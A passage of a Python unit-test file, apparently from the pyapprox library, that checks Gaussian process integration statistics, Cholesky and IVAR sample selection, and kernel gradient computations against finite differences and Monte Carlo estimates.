xi_true],\n intermediate_quantities[6:17], [1e-8]*11)\n\n if nvars == 1:\n nxx = 100\n else:\n nxx = 15\n xx, ww = pya.gauss_hermite_pts_wts_1D(nxx)\n xx = xx*sigma_scalar + mu_scalar\n quad_points = pya.cartesian_product([xx]*nvars)\n quad_weights = pya.outer_product([ww]*nvars)\n mean_of_mean_quad, variance_of_mean_quad, mean_of_variance_quad = \\\n compute_mean_and_variance_of_gaussian_process(\n gp, length_scale, train_samples, A_inv, kernel_var, train_vals,\n quad_points, quad_weights)\n\n assert np.allclose(mean_of_mean_quad, expected_random_mean)\n assert np.allclose(variance_of_mean_quad, variance_random_mean)\n assert np.allclose(mean_of_variance_quad, expected_random_var)\n\n nsamples = 4000\n random_means, random_variances = [], []\n random_I2sq, random_I4, random_I2Isq = [], [], []\n xx, ww = pya.gauss_hermite_pts_wts_1D(nxx)\n xx = xx*sigma_scalar + mu_scalar\n quad_points = pya.cartesian_product([xx]*nvars)\n quad_weights = pya.outer_product([ww]*nvars)\n for ii in range(nsamples):\n vals = gp.predict_random_realization(quad_points)[:, 0]\n I, I2 = vals.dot(quad_weights), (vals**2).dot(quad_weights)\n random_means.append(I)\n random_variances.append(I2-I**2)\n random_I2sq.append(I2**2)\n random_I2Isq.append(I2*I**2)\n random_I4.append(I**4)\n\n # print('MC expected random mean', np.mean(random_means))\n # print('MC variance random mean', np.var(random_means))\n # print('MC expected random variance', np.mean(random_variances))\n # print('MC variance random variance', np.var(random_variances))\n # print('expected random mean', expected_random_mean)\n # print('variance random mean', variance_random_mean)\n # print('expected random variance', expected_random_var)\n # print('variance random variance', variance_random_var)\n assert np.allclose(\n np.mean(random_means), expected_random_mean, rtol=1e-2)\n assert np.allclose(\n np.var(random_means), variance_random_mean, rtol=2.1e-2)\n assert np.allclose(\n expected_random_var, np.mean(random_variances), rtol=1e-2)\n assert np.allclose(\n variance_random_var, np.var(random_variances), rtol=2.2e-2)\n\n def test_integrate_gaussian_process_uniform(self):\n np.random.seed(1)\n nvars = 1\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n ntrain_samples = 7\n train_samples = np.linspace(-1, 1, ntrain_samples)[np.newaxis, :]\n train_vals = func(train_samples)\n\n nu = np.inf\n kernel = Matern(length_scale_bounds=(1e-2, 10), nu=nu)\n # optimize variance\n # kernel = 1*kernel\n # optimize gp noise\n # kernel += WhiteKernel(noise_level_bounds=(1e-8, 1))\n gp = GaussianProcess(kernel, n_restarts_optimizer=1)\n gp.fit(train_samples, train_vals)\n\n univariate_variables = [stats.uniform(-1, 2)]\n variable = pya.IndependentMultivariateRandomVariable(\n univariate_variables)\n\n expected_random_mean, variance_random_mean, expected_random_var, \\\n variance_random_var = integrate_gaussian_process(gp, variable)\n\n true_mean = 1/3\n true_var = 1/5-1/3**2\n\n print('True mean', true_mean)\n print('Expected random mean', expected_random_mean)\n std_random_mean = np.sqrt(variance_random_mean)\n print('Variance random mean', variance_random_mean)\n print('Stdev random mean', std_random_mean)\n print('Expected random mean +/- 3 stdev',\n [expected_random_mean-3*std_random_mean,\n expected_random_mean+3*std_random_mean])\n assert np.allclose(true_mean, expected_random_mean, rtol=1e-2)\n\n print('True var', true_var)\n print('Expected random var', expected_random_var)\n assert np.allclose(expected_random_var, true_var, rtol=1e-2)\n\n nsamples = 
1000\n random_means = []\n xx, ww = pya.gauss_jacobi_pts_wts_1D(100, 0, 0)\n quad_points = pya.cartesian_product([xx]*nvars)\n quad_weights = pya.outer_product([ww]*nvars)\n for ii in range(nsamples):\n vals = gp.predict_random_realization(quad_points)[:, 0]\n random_means.append(vals.dot(quad_weights))\n\n print('MC expected random mean', np.mean(random_means))\n print('MC variance random mean', np.var(random_means))\n assert np.allclose(\n np.mean(random_means), expected_random_mean, rtol=1e-2)\n assert np.allclose(\n np.var(random_means), variance_random_mean, rtol=1e-2)\n\n # xx=np.linspace(-1,1,101)\n # plt.plot(xx,func(xx[np.newaxis,:]))\n # gp_mean,gp_std = gp(xx[np.newaxis,:],return_std=True)\n # gp_mean = gp_mean[:,0]\n # plt.plot(xx,gp_mean)\n # plt.plot(train_samples[0,:],train_vals[:,0],'o')\n # plt.fill_between(xx,gp_mean-2*gp_std,gp_mean+2*gp_std,alpha=0.5)\n # vals = gp.predict_random_realization(xx[np.newaxis,:])\n # plt.plot(xx,vals)\n # plt.show()\n\n\nclass TestSamplers(unittest.TestCase):\n def setUp(self):\n np.random.seed(1)\n\n def test_cholesky_sampler_basic_restart(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n sampler = CholeskySampler(nvars, 100, variables)\n kernel = pya.Matern(1, length_scale_bounds='fixed', nu=np.inf)\n sampler.set_kernel(kernel)\n\n num_samples = 10\n samples = sampler(num_samples)[0]\n\n sampler2 = CholeskySampler(nvars, 100, variables)\n sampler2.set_kernel(kernel)\n samples2 = sampler2(num_samples//2)[0]\n samples2 = np.hstack([samples2, sampler2(num_samples)[0]])\n assert np.allclose(samples2, samples)\n\n def test_cholesky_sampler_restart_with_changed_kernel(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n kernel1 = pya.Matern(1, length_scale_bounds='fixed', nu=np.inf)\n kernel2 = pya.Matern(0.1, length_scale_bounds='fixed', nu=np.inf)\n\n num_samples = 10\n sampler = CholeskySampler(nvars, 100, variables)\n sampler.set_kernel(kernel1)\n samples = sampler(num_samples)[0]\n\n sampler2 = CholeskySampler(nvars, 100, variables)\n sampler2.set_kernel(kernel1)\n samples2 = sampler2(num_samples//2)[0]\n sampler2.set_kernel(kernel2)\n samples2 = np.hstack([samples2, sampler2(num_samples)[0]])\n\n # plt.plot(samples[0, :], samples[0, :]*0, 'o')\n # plt.plot(samples2[0, :], samples2[0, :]*0,'x')\n # plt.show()\n assert np.allclose(sampler2.pivots[:num_samples//2],\n sampler.pivots[:num_samples//2])\n assert not np.allclose(samples2, samples)\n\n def test_cholesky_sampler_restart_with_changed_weight_function(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n kernel1 = pya.Matern(1, length_scale_bounds='fixed', nu=np.inf)\n \n def wfunction1(x): return np.ones(x.shape[1])\n \n def wfunction2(x): return x[0, :]**2\n\n num_samples = 10\n sampler = CholeskySampler(nvars, 100, variables)\n sampler.set_kernel(kernel1)\n sampler.set_weight_function(wfunction1)\n samples = sampler(num_samples)[0]\n\n sampler2 = CholeskySampler(nvars, 100, variables)\n sampler2.set_kernel(kernel1)\n sampler2.set_weight_function(wfunction1)\n samples2 = sampler2(num_samples//2)[0]\n sampler2.set_weight_function(wfunction2)\n samples2 = np.hstack([samples2, sampler2(num_samples)[0]])\n\n assert np.allclose(sampler2.pivots[:num_samples//2],\n sampler.pivots[:num_samples//2])\n\n assert not np.allclose(samples2, samples)\n\n def test_cholesky_sampler_adaptive_gp_fixed_kernel(self):\n nvars = 1\n 
variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n \n def func(samples): return np.array(\n [np.sum(samples**2, axis=0), np.sum(samples**3, axis=0)]).T\n\n validation_samples = np.random.uniform(0, 1, (nvars, 100))\n nsamples = 3\n\n kernel = pya.Matern(1, length_scale_bounds='fixed', nu=3.5)\n sampler1 = CholeskySampler(nvars, 100, None)\n sampler1.set_kernel(copy.deepcopy(kernel))\n gp1 = AdaptiveCholeskyGaussianProcessFixedKernel(sampler1, func)\n gp1.refine(nsamples)\n vals1 = gp1(validation_samples)\n\n # currently AdaptiveGaussianProcess can only handle scalar QoI\n # so only test first QoI of func.\n def func2(samples): return func(samples)[:, :1]\n \n sampler2 = CholeskySampler(nvars, 100, None)\n sampler2.set_kernel(copy.deepcopy(kernel))\n gp2 = AdaptiveGaussianProcess(kernel=kernel, alpha=1e-12)\n gp2.setup(func2, sampler2)\n gp2.refine(nsamples)\n vals2 = gp2(validation_samples)\n\n assert np.allclose(gp1.train_samples, gp2.X_train_.T)\n assert np.allclose(gp1.train_values[:, 0:1], gp2.y_train_)\n assert np.allclose(vals1[:, 0:1], vals2)\n\n # xx = np.linspace(0,1,101)\n # plt.plot(xx,gp1(xx[np.newaxis,:]),'-r')\n # plt.plot(xx,gp2(xx[np.newaxis,:]),'-k')\n # plt.plot(gp1.train_samples[0,:],gp1.train_values[:,0],'ro')\n # plt.plot(gp2.X_train_.T[0,:],gp2.y_train_,'ks')\n # plt.show()\n\n gp1.refine(2*nsamples)\n vals1 = gp1(validation_samples)\n gp2.refine(2*nsamples)\n vals2 = gp2(validation_samples)\n assert np.allclose(vals1[:, 0:1], vals2)\n\n def test_cholesky_sampler_adaptive_gp_fixed_kernel_II(self):\n np.random.seed(1)\n nvars = 10\n sampler_length_scale = 0.5\n sampler_matern_nu = np.inf\n ncandidate_samples = 1000\n\n alpha_stat, beta_stat = 20, 20\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(a=alpha_stat, b=beta_stat)]*nvars)\n\n generate_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n weight_function = partial(\n pya.tensor_product_pdf,\n univariate_pdfs=partial(stats.beta.pdf, a=alpha_stat, b=beta_stat))\n\n def gp_mean_function(kernel, samples, alpha, X):\n return kernel(X.T, samples.T).dot(alpha)\n \n def random_gaussian_process(kernel, samples):\n alpha = np.random.normal(0, 1, (samples.shape[1], 1))\n return partial(gp_mean_function, kernel, samples, alpha)\n\n ntrials = 100\n lb, ub = 0, 1\n func_length_scale = sampler_length_scale\n func_matern_nu = sampler_matern_nu\n func_kernel = pya.Matern(\n func_length_scale, length_scale_bounds='fixed', nu=func_matern_nu)\n funcs = [random_gaussian_process(func_kernel, np.random.uniform(\n lb, ub, (nvars, 1000))) for n in range(ntrials)]\n\n def multiple_qoi_function(funcs, samples):\n return np.array([f(samples)[:,0] for f in funcs]).T\n \n func = partial(multiple_qoi_function, funcs)\n\n sampler_kernel = pya.Matern(\n sampler_length_scale, length_scale_bounds='fixed',\n nu=sampler_matern_nu)\n\n weight_function = None\n sampler = pya.CholeskySampler(\n nvars, ncandidate_samples, variables,\n generate_random_samples=generate_samples)\n sampler.set_kernel(copy.deepcopy(sampler_kernel))\n sampler.set_weight_function(weight_function)\n\n nvalidation_samples = 1000\n generate_validation_samples = generate_samples\n validation_samples = generate_validation_samples(nvalidation_samples)\n validation_values = func(validation_samples)\n\n class Callback(object):\n def __init__(self, validation_samples, validation_values,\n norm_ord=2):\n self.errors, self.nsamples, self.condition_numbers = [], [], []\n self.validation_samples = 
validation_samples\n self.validation_values = validation_values\n self.norm = partial(np.linalg.norm, ord=norm_ord)\n \n def __call__(self, approx):\n pred_values = approx(self.validation_samples)\n assert pred_values.shape == self.validation_values.shape\n error = self.norm(\n pred_values-self.validation_values,axis=0)/self.norm(\n self.validation_values, axis=0)\n self.errors.append(error)\n self.nsamples.append(approx.num_training_samples())\n self.condition_numbers.append(approx.condition_number())\n\n\n callback = Callback(validation_samples, validation_values)\n gp = pya.AdaptiveCholeskyGaussianProcessFixedKernel(sampler, func)\n\n #checkpoints = [5, 10, 100, 500]\n checkpoints = [5, 10, 20, 50, 100, 200, 300, 500, 1000]\n nsteps = len(checkpoints)\n for ii in range(nsteps):\n gp.refine(checkpoints[ii])\n callback(gp)\n\n assert np.median(callback.errors ,axis=1) < 1e-3\n \n #print(np.median(callback.errors,axis=1))\n #plt.loglog(checkpoints, np.median(callback.errors ,axis=1))\n #plt.show()\n\n \n \n def test_RBF_posterior_variance_gradient_wrt_samples(self):\n nvars = 2\n lb, ub = 0, 1\n ntrain_samples_1d = 10\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n pred_samples = np.random.uniform(0, 1, (nvars, 3))\n x0 = train_samples[:, :1]\n grad = RBF_gradient_wrt_samples(\n x0, pred_samples, length_scale)\n\n fd_grad = pya.approx_jacobian(\n lambda x: kernel(x, pred_samples.T)[0, :], x0[:,0])\n assert np.allclose(grad, fd_grad, atol=1e-6)\n errors = pya.check_gradients(\n lambda x: kernel(x.T, pred_samples.T)[0, :],\n lambda x: RBF_gradient_wrt_samples(\n x, pred_samples, length_scale), x0)\n assert errors.min()<1e-6\n\n jac = RBF_posterior_variance_jacobian_wrt_samples(\n train_samples, pred_samples, kernel)\n\n x0 = train_samples.flatten(order='F')\n assert np.allclose(\n train_samples, x0.reshape(train_samples.shape, order='F'))\n\n def func(x_flat):\n return gaussian_process_pointwise_variance(\n kernel, pred_samples, x_flat.reshape(\n train_samples.shape, order='F'))\n fd_jac = pya.approx_jacobian(func, x0)\n\n # print(jac, '\\n\\n',f d_jac)\n # print('\\n', np.absolute(jac-fd_jac).max())\n assert np.allclose(jac, fd_jac, atol=1e-5)\n\n errors = pya.check_gradients(\n func,\n lambda x: RBF_posterior_variance_jacobian_wrt_samples(\n x.reshape(nvars, x.shape[0]//nvars, order='F'),\n pred_samples, kernel), x0[:, np.newaxis])\n assert errors.min()<2e-6\n\n def check_matern_gradient_wrt_samples(self, nu):\n nvars = 2\n lb, ub = 0, 1\n ntrain_samples_1d = 3\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = Matern(length_scale, length_scale_bounds='fixed', nu=nu)\n\n pred_samples = np.random.uniform(lb, ub, (nvars, 1))\n x0 = train_samples[:, :1]\n grad = matern_gradient_wrt_samples(\n nu, x0, pred_samples, length_scale)\n K = kernel(x0.T, pred_samples.T)\n\n fd_grad = pya.approx_jacobian(\n lambda x: kernel(x, pred_samples.T)[0, :], x0[:,0])\n assert np.allclose(grad, fd_grad, atol=1e-6)\n errors = pya.check_gradients(\n lambda x: kernel(x.T, pred_samples.T)[0, :],\n lambda x: matern_gradient_wrt_samples(\n nu, x, pred_samples, length_scale), x0)\n assert errors.min()<1e-6\n\n def test_matern_gradient_wrt_samples(self):\n self.check_matern_gradient_wrt_samples(3/2)\n self.check_matern_gradient_wrt_samples(5/2)\n 
self.check_matern_gradient_wrt_samples(np.inf)\n\n def test_RBF_posterior_variance_gradient_wrt_samples_subset(\n self):\n nvars = 2\n lb, ub = 0, 1\n ntrain_samples_1d = 10\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n train_vals = func(train_samples)\n\n new_samples_index = train_samples.shape[1]-10\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n pred_samples = np.random.uniform(0, 1, (nvars, 3))\n jac = RBF_posterior_variance_jacobian_wrt_samples(\n train_samples, pred_samples, kernel, new_samples_index)\n\n x0 = train_samples.flatten(order='F')\n assert np.allclose(\n train_samples, x0.reshape(train_samples.shape, order='F'))\n\n def func(x_flat):\n return gaussian_process_pointwise_variance(\n kernel, pred_samples, x_flat.reshape(\n train_samples.shape, order='F'))\n fd_jac = pya.approx_jacobian(func, x0)[:,new_samples_index*nvars:]\n\n # print(jac, '\\n\\n',f d_jac)\n #print('\\n', np.absolute(jac-fd_jac).max())\n assert np.allclose(jac, fd_jac, atol=1e-5)\n\n def test_integrate_grad_P(self):\n nvars = 2\n univariate_variables = [stats.norm()]*nvars\n #lb, ub = univariate_variables[0].interval(0.99999)\n lb, ub = -2, 2 \n\n ntrain_samples_1d = 2\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.5, 0.4][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n # the shorter the length scale the larger the number of quadrature\n # points is needed\n xx_1d, ww_1d = pya.gauss_hermite_pts_wts_1D(100)\n grad_P = integrate_grad_P(\n [xx_1d]*nvars, [ww_1d]*nvars, train_samples, length_scale)[0]\n\n a, b = train_samples[:, 0]\n mu = [0]*nvars\n sigma = [1]*nvars\n term1 = gaussian_grad_P_diag_term1(a, length_scale[0], mu[0], sigma[0])\n term2 = gaussian_grad_P_diag_term2(b, length_scale[1], mu[1], sigma[1])\n assert np.allclose(\n term1,\n gaussian_grad_P_offdiag_term1(\n a, a, length_scale[0], mu[0], sigma[0]))\n assert np.allclose(\n term2,\n gaussian_grad_P_offdiag_term2(\n b, b, length_scale[1], mu[1], sigma[1]))\n assert np.allclose(\n term1,\n ((xx_1d-a)/length_scale[0]**2*np.exp(\n -(xx_1d-a)**2/(2*length_scale[0]**2))**2).dot(ww_1d))\n assert np.allclose(\n term2,(np.exp(-(xx_1d-b)**2/(2*length_scale[1]**2))**2).dot(ww_1d))\n\n pred_samples = pya.cartesian_product([xx_1d]*nvars)\n weights = pya.outer_product([ww_1d]*nvars)\n for ii in range(train_samples.shape[1]):\n x0 = train_samples[:, ii:ii+1]\n grad = RBF_gradient_wrt_samples(\n x0, pred_samples, length_scale)\n for jj in range(train_samples.shape[1]):\n x1 = train_samples[:, jj:jj+1]\n K = kernel(pred_samples.T, x1.T)\n for kk in range(nvars):\n grad_P_quad = (grad[:, kk:kk+1]*K).T.dot(weights)\n t1 = gaussian_grad_P_offdiag_term1(\n x0[kk, 0], x1[kk, 0], length_scale[kk],\n mu[kk], sigma[kk])\n t2 = gaussian_grad_P_offdiag_term2(\n x0[1-kk,0], x1[1-kk,0], length_scale[1-kk],\n mu[1-kk], sigma[1-kk])\n grad_P_exact = t1*t2\n if ii == jj:\n grad_P_quad *= 2\n grad_P_exact *= 2\n assert np.allclose(grad_P_quad, grad_P_exact)\n assert np.allclose(grad_P_quad, grad_P[nvars*ii+kk,jj])\n #assert False\n #assert np.allclose(grad_P_mc, grad_P[kk,ii,jj])\n\n def test_integrate_grad_P_II(self):\n nvars = 2\n univariate_variables = [stats.norm()]*nvars\n #lb, ub = univariate_variables[0].interval(0.99999)\n lb, ub = -2, 2 \n\n ntrain_samples_1d = 4\n\n train_samples = pya.cartesian_product(\n 
[np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.5, 0.4, 0.6][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n # the shorter the length scale the larger the number of quadrature\n # points is needed\n xx_1d, ww_1d = pya.gauss_hermite_pts_wts_1D(100)\n grad_P, P = integrate_grad_P(\n [xx_1d]*nvars, [ww_1d]*nvars, train_samples, length_scale)\n\n def func1(xtr):\n xtr = xtr.reshape((nvars, train_samples.shape[1]), order='F')\n P = 1\n for kk in range(nvars):\n P *= integrate_tau_P(\n xx_1d, ww_1d, xtr[kk:kk+1, :], length_scale[kk])[1]\n\n vals = P.flatten(order='F')\n # vals = [P[0,0], P[1,0], ..., P[N-1,0], P[0,1], P[1,1], ... P[N-1,1]\n # ...]\n return vals\n\n x0 = train_samples.flatten(order='F')\n P_fd_jac = pya.approx_jacobian(func1, x0)\n ntrain_samples = train_samples.shape[1]\n assert np.allclose(\n P_fd_jac.shape, (ntrain_samples**2, nvars*ntrain_samples))\n P_fd_jac_res = P_fd_jac.reshape(\n (ntrain_samples, ntrain_samples, nvars*ntrain_samples), order='F')\n from sklearn.gaussian_process.kernels import _approx_fprime\n assert np.allclose(_approx_fprime(x0, lambda x: func1(x).reshape(ntrain_samples, ntrain_samples, order='F'), np.sqrt(np.finfo(float).eps)),P_fd_jac_res)\n\n # Consider 3 training samples with\n # P = P00 P01 P02\n # P10 P11 P12\n # P20 P21 P22\n # for kth training sample grad_P stores \n # Pk0 Pk1 Pk2\n # All entries not involving k are zero, e.g. for k=0 the terms\n # P11 P12 P21 P22 will be zero such that\n # dP/d(x[0,n]) = C00 C01 C02\n # C10 0 0\n # C20 0 0\n jac = np.empty_like(P_fd_jac)\n for kk in range(ntrain_samples):\n for nn in range(nvars):\n tmp = np.zeros((ntrain_samples, ntrain_samples))\n tmp[kk, :] = grad_P[kk*nvars+nn, :]\n tmp[:, kk] = tmp[kk, :]\n assert np.allclose(P_fd_jac_res[:, :, kk*nvars+nn], tmp)\n\n def func2(xtr):\n xtr = xtr.reshape((nvars, train_samples.shape[1]), order='F')\n A_inv = np.linalg.inv(kernel(xtr.T))\n return A_inv.flatten(order='F')\n\n def func3(xtr):\n xtr = xtr.reshape((nvars, train_samples.shape[1]), order='F')\n P = 1\n for kk in range(nvars):\n P *= integrate_tau_P(\n xx_1d, ww_1d, xtr[kk:kk+1, :], length_scale[kk])[1]\n A_inv = np.linalg.inv(kernel(xtr.T))\n val = np.sum(A_inv*P)\n return -val\n\n A_fd_jac = pya.approx_jacobian(func2, x0).reshape((\n ntrain_samples, ntrain_samples, nvars*ntrain_samples), order='F')\n assert np.allclose(_approx_fprime(x0, lambda x: func2(x).reshape(ntrain_samples, ntrain_samples, order='F'), np.sqrt(np.finfo(float).eps)),A_fd_jac)\n\n A_inv = np.linalg.inv(kernel(train_samples.T))\n assert np.allclose(func3(x0),-np.sum(A_inv*P))\n obj_fd_split = -np.sum(A_fd_jac*P[:,:,np.newaxis] + P_fd_jac_res*A_inv[:,:,np.newaxis],axis=(0,1))\n \n obj_fd_jac = pya.approx_jacobian(func3, x0)[0,:]\n assert np.allclose(obj_fd_split, obj_fd_jac)\n\n assert np.allclose(\n P, func1(x0).reshape((ntrain_samples, ntrain_samples), order='F'))\n jac = np.zeros((nvars*ntrain_samples))\n jac1 = np.zeros((nvars*ntrain_samples))\n AinvPAinv = (A_inv.dot(P).dot(A_inv))\n for kk in range(ntrain_samples):\n K_train_grad_all_train_points_kk = \\\n RBF_gradient_wrt_samples(\n train_samples[:, kk:kk+1], train_samples, length_scale)\n # Use the follow properties for tmp3 and tmp4\n # Do sparse matrix element wise product\n # 0 a 0 D00 D01 D02\n # a b c x D10 D11 D12\n # 0 c 0 D20 D21 D22\n # =2*(a*D01 b*D11 + c*D21)-b*D11\n #\n # Trace [RCRP] = Trace[RPRC] for symmetric matrices\n tmp3 = -2*np.sum(K_train_grad_all_train_points_kk.T*AinvPAinv[:, kk],\n axis=1)\n tmp3 -= 
-K_train_grad_all_train_points_kk[kk, :]*AinvPAinv[kk, kk]\n jac1[kk*nvars:(kk+1)*nvars] = -tmp3\n tmp4 = 2*np.sum(grad_P[kk*nvars:(kk+1)*nvars]*A_inv[:, kk], axis=1)\n tmp4 -= grad_P[kk*nvars:(kk+1)*nvars,kk]*A_inv[kk, kk]\n jac1[kk*nvars:(kk+1)*nvars] -= tmp4\n # check these numpy operations with an explicit loop calculation\n for nn in range(nvars):\n tmp1 = np.zeros((ntrain_samples, ntrain_samples))\n tmp1[kk, :] = grad_P[kk*nvars+nn, :]\n tmp1[:, kk] = tmp1[kk, :]\n assert np.allclose(P_fd_jac_res[:,:,kk*nvars+nn], tmp1)\n tmp2 = np.zeros((ntrain_samples, ntrain_samples))\n tmp2[kk, :] = K_train_grad_all_train_points_kk[:, nn]\n tmp2[:, kk] = tmp2[kk, :]\n tmp2 = -A_inv.dot(tmp2.dot(A_inv))\n assert np.allclose(A_fd_jac[:,:,kk*nvars+nn], tmp2, atol=1e-6)\n jac[kk*nvars+nn] -= np.sum(tmp2*P+A_inv*tmp1)\n\n assert np.allclose(jac, obj_fd_jac)\n assert np.allclose(jac1, obj_fd_jac)\n\n jac2 = \\\n RBF_integrated_posterior_variance_gradient_wrt_samples(\n train_samples, [xx_1d]*nvars, [ww_1d]*nvars, kernel)\n assert np.allclose(jac2, obj_fd_jac)\n\n def test_RBF_integrated_posterior_variance_gradient_wrt_sample_subset(self):\n nvars = 2\n lb, ub = -1, 1\n ntrain_samples_1d = 10\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n train_vals = func(train_samples)\n\n new_samples_index = train_samples.shape[1]-10\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n xx_1d, ww_1d = pya.gauss_jacobi_pts_wts_1D(100, 0, 0)\n t0 = time.time()\n jac = RBF_integrated_posterior_variance_gradient_wrt_samples(\n train_samples, [xx_1d]*nvars, [ww_1d]*nvars, kernel,\n new_samples_index)\n print(time.time()-t0)\n\n x0 = train_samples.flatten(order='F')\n assert np.allclose(\n train_samples, x0.reshape(train_samples.shape, order='F'))\n\n def func(x_flat):\n xtr = x_flat.reshape((nvars, train_samples.shape[1]), order='F')\n P = 1\n for kk in range(nvars):\n P *= integrate_tau_P(\n xx_1d, ww_1d, xtr[kk:kk+1, :], length_scale[kk])[1]\n A_inv = np.linalg.inv(kernel(xtr.T))\n val = np.sum(A_inv*P)\n return -val\n\n t0 = time.time()\n fd_jac = pya.approx_jacobian(func, x0)[0,new_samples_index*nvars:]\n print(time.time()-t0)\n\n print(jac, '\\n\\n', fd_jac)\n #print('\\n', np.absolute(jac-fd_jac).max())\n assert np.allclose(jac, fd_jac, atol=1e-5)\n\n def test_monte_carlo_gradient_based_ivar_sampler(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n \n # correlation length affects ability to check gradient. As kerenl matrix\n # gets more ill conditioned then gradients get worse\n greedy_method = 'ivar'\n #greedy_method = 'chol'\n use_gauss_quadrature = False\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n sampler = IVARSampler(\n nvars, 1000, 1000, generate_random_samples, variables,\n greedy_method, use_gauss_quadrature=use_gauss_quadrature,\n nugget=1e-14)\n sampler.set_kernel(copy.deepcopy(kernel))\n\n def weight_function(samples):\n return np.prod([variables.all_variables()[ii].pdf(samples[ii,:])\n for ii in range(samples.shape[0])],axis=0)\n\n if greedy_method == 'chol':\n sampler.set_weight_function(weight_function)\n\n # nature of training samples affects ability to check gradient. 
As\n # training samples makes kernel matrix more ill conditioned then\n # gradients get worse\n ntrain_samples_1d = 10\n train_samples = pya.cartesian_product(\n [np.linspace(0, 1, ntrain_samples_1d)]*nvars)\n x0 = train_samples.flatten(order='F')\n if not use_gauss_quadrature:\n # gradients not currently implemented when using quadrature\n errors = pya.check_gradients(\n sampler.objective, sampler.objective_gradient, x0[:,np.newaxis],\n disp=False)\n assert errors.min()<4e-6\n\n gsampler = sampler.greedy_sampler\n #print(np.linalg.norm(gsampler.candidate_samples))\n #print(np.linalg.norm(sampler.pred_samples))\n\n ntrain_samples = 20\n new_samples1 = sampler(ntrain_samples)[0].copy()\n\n val1 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n sampler.training_samples).mean()\n val2 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n sampler.init_guess).mean()\n # can't just call sampler.objective here because self.training_points\n # has been updated and calling objective(sampler.training_samples)\n # will evaluate objective with training samples repeated twice.\n # Similarly init guess will be concatenated with self.training_samples\n # if passed to objective at this point\n print(val1, val2)\n assert (val1 < val2)\n\n new_samples2 = sampler(2*ntrain_samples)[0]\n # currently the following check will fail because a different set\n # of prediction samples will be generated by greedy sampler\n # assert np.allclose(\n # 1+sampler.greedy_sampler.best_obj_vals[ntrain_samples-1], val1)\n\n assert np.allclose(\n new_samples1, sampler.training_samples[:, :ntrain_samples],\n atol=1e-12)\n\n assert np.allclose(\n sampler.greedy_sampler.training_samples[:, :ntrain_samples],\n new_samples1, atol=1e-12)\n \n val1 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n sampler.training_samples).mean()\n # initial guess used by optimizer does not contain\n # fixed training points already selected so add here \n greedy_samples = np.hstack([sampler.training_samples[:,:ntrain_samples],\n sampler.init_guess])\n val2 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n greedy_samples).mean()\n print(val1, val2)\n assert (val1 < val2)\n \n # plt.plot(sampler.training_samples[0, :],\n # sampler.training_samples[1, :], 'o')\n # plt.plot(sampler.greedy_sampler.training_samples[0, :],\n # sampler.greedy_sampler.training_samples[1, :], 'x')\n # plt.plot(sampler.init_guess[0, :],\n # sampler.init_guess[1, :], '^')\n # plt.show()\n\n def test_quadrature_gradient_based_ivar_sampler(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n \n # correlation length affects ability to check gradient. 
As the kernel matrix\n        # gets more ill-conditioned, the gradients get worse\n        greedy_method = 'ivar'\n        #greedy_method = 'chol'\n        use_gauss_quadrature = True\n        kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n        sampler = IVARSampler(\n            nvars, 1000, 1000, generate_random_samples, variables,\n            greedy_method, use_gauss_quadrature=use_gauss_quadrature)\n        sampler.set_kernel(copy.deepcopy(kernel))\n\n        def weight_function(samples):\n            return np.prod([variables.all_variables()[ii].pdf(samples[ii,:])\n                            for ii in range(samples.shape[0])],axis=0)\n\n        if greedy_method == 'chol':\n            sampler.set_weight_function(weight_function)\n\n        # nature of training samples affects ability to check gradient. As\n        # training samples make the kernel matrix more ill-conditioned, the\n        # gradients get worse\n        ntrain_samples_1d = 10\n        train_samples = pya.cartesian_product(\n            [np.linspace(0, 1, ntrain_samples_1d)]*nvars)\n        x0 = train_samples.flatten(order='F')\n        if not use_gauss_quadrature:\n            # gradients not currently implemented when using quadrature\n            errors = pya.check_gradients(\n                sampler.objective, sampler.objective_gradient, x0[:,np.newaxis],\n                disp=False)\n            assert errors.min()<4e-6\n\n        gsampler = sampler.greedy_sampler\n        #print(np.linalg.norm(gsampler.candidate_samples))\n        